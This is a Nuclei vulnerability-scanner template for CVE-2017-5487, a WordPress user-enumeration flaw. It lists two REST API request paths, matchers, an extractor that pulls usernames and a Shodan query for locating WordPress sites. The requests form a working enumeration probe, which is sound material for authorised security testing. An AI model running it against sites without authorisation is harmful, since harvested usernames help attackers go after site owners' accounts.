id: CVE-2017-5487 info: name: WordPress Core <4.7.1 - Username Enumeration author: Manas_Harsh,daffainfo,geeknik,dr0pd34d severity: medium description: WordPress Core before 4.7.1 is susceptible to user enumeration because it does not properly restrict listings of post authors via wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API, which allows a remote attacker to obtain sensitive information via a wp-json/wp/v2/users request. remediation: | Update WordPress to version 4.7.1 or later reference: - https://www.exploit-db.com/exploits/41497 - https://www.wordfence.com/blog/2016/12/wordfence-blocks-username-harvesting-via-new-rest-api-wp-4-7/ - https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/ - https://nvd.nist.gov/vuln/detail/CVE-2017-5487 - http://www.openwall.com/lists/oss-security/2017/01/14/6 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2017-5487 cwe-id: CWE-200 epss-score: 0.97179 epss-percentile: 0.99762 cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: wordpress product: wordpress shodan-query: http.component:"WordPress" tags: cve,cve2017,wordpress,wp,edb http: - method: GET path: - "{{BaseURL}}/wp-json/wp/v2/users/" - "{{BaseURL}}/?rest_route=/wp/v2/users/" stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - '"id":' - '"name":' - '"avatar_urls":' condition: and - type: word part: header words: - "application/json" - type: status status: - 200 extractors: - type: json name: "usernames" json: - '.[] | .slug' - '.[].name' part: body # digest: 490a0046304402202991b04c30cab875013e85d7149fa9e2f788cb4fddbea96b76cf47f79f37539002207a99be92fabb9fd359b7015307198dbc3bc21cfeaa69b05fc5852db754645459:922c64590222798bb761d5b6d8e72950